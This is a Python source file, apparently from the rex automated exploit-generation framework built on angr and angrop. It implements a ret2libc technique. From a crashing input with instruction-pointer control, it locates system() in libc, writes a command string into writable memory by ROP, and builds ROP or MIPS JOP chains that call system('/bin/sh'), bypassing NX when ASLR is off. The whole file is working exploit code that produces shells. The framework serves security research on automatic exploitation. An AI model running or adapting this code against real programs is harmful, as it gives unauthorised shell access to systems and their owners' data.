import os
import logging

import angr
import claripy
from angrop.errors import RopException

from ...vulnerability import Vulnerability
from ..technique import Technique
from .. import Exploit, CannotExploit

l = logging.getLogger("rex.exploit.techniques.ret2libc")

class Ret2Libc(Technique):
    """
    A technique to ROP and invoke system in libc
    """

    name = "ret2libc"
    applicable_to = ['unix']

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self._system_addrs = []

        # init solver for pointer badbyte calculation
        self._solver = claripy.Solver()
        self._sym_ptr = claripy.BVS("ptr", self.crash.project.arch.bits)
        for b in self.crash._bad_bytes:
            for i in range(self.crash.project.arch.bytes):
                self._solver.add(self._sym_ptr.get_byte(i) != b)

    def contain_bad_byte(self, ptr):
        return not self._solver.satisfiable(extra_constraints=[self._sym_ptr == ptr])

    def _find_libs_system_addrs(self):
        system_addrs = []
        libc_name = os.path.basename(self.crash.libc_binary)

        # angr does not handle PLT well for some architectures,
        # so we do it by ourselves
        for sym in self.rop.project.loader.symbols:
            if sym.name != "system":
                continue
            addr = sym.rebased_addr
            # make sure it is executable, both system itself and plt are executable
            seg = self.rop.project.loader.find_segment_containing(addr)
            if seg is None or not seg.is_executable:
                continue

            # make sure it does not have bad bytes
            if self.contain_bad_byte(addr):
                continue

            # we still prefer libc system, because this technique is called ret2libc lol
            l.debug("found usable system address @ %#x in segment %s", addr, seg)
            if sym.owner.binary_basename == libc_name:
                system_addrs = [addr] + system_addrs
            else:
                system_addrs.append(addr)

        self._system_addrs = system_addrs

    def check(self):
        if self.libc_rop is None:
            self.check_fail_reason("No libc ROP available.")
            return False

        # can only exploit ip overwrites
        if not self.crash.one_of([Vulnerability.IP_OVERWRITE, Vulnerability.PARTIAL_IP_OVERWRITE]):
            self.check_fail_reason("Cannot control IP.")
            return False

        # can only work when aslr is off
        if self.crash.aslr:
            self.check_fail_reason("Cannot work when ASLR is on.")
            return False

        # there should be a system function
        self._find_libs_system_addrs()
        if not self._system_addrs:
            self.check_fail_reason("Cannot find system in libc.")
            return False

        return True

    def _find_writable_region(self, data):
        segments = self.libc_rop.project.loader.main_object.segments
        for seg in segments:
            if seg.is_writable:
                consts = [self._sym_ptr >= seg.min_addr, self._sym_ptr <= seg.max_addr - len(data)]
                if self._solver.satisfiable(extra_constraints=consts):
                    return self._solver.eval(self._sym_ptr, 1, extra_constraints=consts)[0]
        raise RopException("Cannot find writable region inside libc")

    def _write_cmd_str(self, cmd_str):
        # only use write with ROP

        # look for writable address
        l.debug("Looking for writable region...")
        addr = self._find_writable_region(cmd_str)
        l.debug("Found writable address @ %#x", addr)

        # write rop chain to the address
        l.debug("Trying to use ROP chain to write %s into %#x...", cmd_str, addr)
        chain = self.crash.libc_rop.write_to_mem(addr, cmd_str, fill_byte=self._get_fill_byte())
        chain, chain_addr = self._ip_overwrite_with_chain(chain, state=self.crash.state, rop=self.libc_rop)

        # add constraints
        l.debug("Applying all the constraints, fingers crossed...")
        payload = chain.payload_str(timeout=len(chain._values)*2)
        chain_mem = self.crash.state.memory.load(chain_addr, len(payload))
        chain_bvv = claripy.BVV(payload)
        self.crash.state.add_constraints(chain_mem == chain_bvv)

        # windup
        self._windup_to_unconstrained_successor()

        return addr, (True)

    def _invoke_system(self, system_addr, cmd_addr):
        """
        generate a rop chain to invoke system(cmd_addr)
        """
        if not self.crash.project.arch.name.startswith("MIPS"):
            chain = self.libc_rop.func_call(system_addr, [cmd_addr])
            # insert the chain into the binary
            try:
                chain, chain_addr = self._ip_overwrite_with_chain(chain, state=self.crash.state, rop=self.libc_rop)
            except CannotExploit as e:
                raise CannotExploit("[%s] unable to insert chain" % self.name) from e

            # add the constraint to the state that the chain must exist at the address
            chain_mem = self.crash.state.memory.load(chain_addr, chain.payload_len)
            payload = chain.payload_str(timeout=len(chain._values)*2)
            self.crash.state.add_constraints(chain_mem == claripy.BVV(payload))
            return

        # mips does some weird shit, we need to handle it separately
        chain = self.libc_rop.set_regs(a0=cmd_addr)
        chain, chain_addr = self._ip_overwrite_with_chain(chain, state=self.crash.state, rop=self.libc_rop)
        chain_mem = self.crash.state.memory.load(chain_addr, chain.payload_len)
        payload = chain.payload_str(timeout=len(chain._values)*2)
        self.crash.state.add_constraints(chain_mem == claripy.BVV(payload))
        self._windup_to_unconstrained_successor()

        # list all potential JOP gadgets
        gadgets = [g for g in self.libc_rop.rop_gadgets if g.gadget_type == "jump"
                   and g.jump_reg == 't9' and g.pc_reg != 't9']

        # filter out gadgets that touches a0
        # we need to filter out reads and writes to avoid SIGSEGV from them with invalid addresses
        gadgets = [g for g in gadgets if 'a0' not in g.changed_regs and not g.mem_reads and not g.mem_writes]

        # look for a good chain
        jop_gadget = None
        set_reg_gadget = None
        for jop_gadget in gadgets:
            pc_reg = jop_gadget.pc_reg
            gadgets2 = [g for g in self.libc_rop.rop_gadgets if pc_reg in g.popped_regs]
            # we need to filter out reads and writes to avoid SIGSEGV from them with invalid addresses
            gadgets3 = [g for g in gadgets2 if 'a0' not in g.changed_regs and not g.mem_reads and not g.mem_writes]
            if gadgets3:
                set_reg_gadget = min(gadgets3, key=lambda g: g.stack_change) # get the smallest one
                break
        else:
            raise RopException("Fail to build JOP chain")
        self.crash.state.solver.add(self.crash.state.ip == set_reg_gadget.addr)
        self._windup_to_unconstrained_successor()

        self.crash.state.solver.add(self.crash.state.ip == jop_gadget.addr)
        self._windup_to_unconstrained_successor()

        self.crash.state.solver.add(self.crash.state.regs.t9 == system_addr)

    def apply(self, cmd=b'/bin/sh', **kwargs):# pylint:disable=arguments-differ
        system_addr = self._system_addrs[0]

        # just for /bin/sh
        cmd_str = cmd + b'\x00'

        # look for cmd_str, usually "/bin/sh\x00", if it does not exist in the binary, write it to the memory
        cmd_addr = next(self.crash.project.loader.main_object.memory.find(cmd_str), None)
        if cmd_addr:
            cmd_addr += self.crash.project.loader.main_object.mapped_base
            if not self.contain_bad_byte(cmd_addr):
                l.debug("Found command %s in the memory at %#x!", cmd_str, cmd_addr)
            else:
                cmd_addr = None

        # if writing the cmd to memory is necessary, don't use null byte
        # or it will cause some troubles in ropchain generation
        # also, avoid blank space
        cmd_str = self._encode_cmd(cmd)

        try:
            if not cmd_addr:
                # write out cmd_str
                l.debug("Try to write command %s into the memory", cmd_str)
                cmd_addr, cmd_constraint = self._write_cmd_str(cmd_str)
                if not cmd_addr:
                    raise CannotExploit("[%s] cannot write command to memory" % self.name)

                # apply the constraint that cmd_str must exist in the binary
                self.crash.state.add_constraints(cmd_constraint)

            # craft chain to call system
            l.debug("Try to invoke system(%s)", cmd_str)
            self._invoke_system(system_addr, cmd_addr)
        except (RopException, angr.errors.SimUnsatError) as e:
            raise CannotExploit("[%s] cannot craft caller chain" % self.name) from e

        if not self.crash.state.satisfiable():
            raise CannotExploit("[%s] generated exploit is not satisfiable" % self.name)

        return Exploit(self.crash, bypasses_nx=True, bypasses_aslr=False)
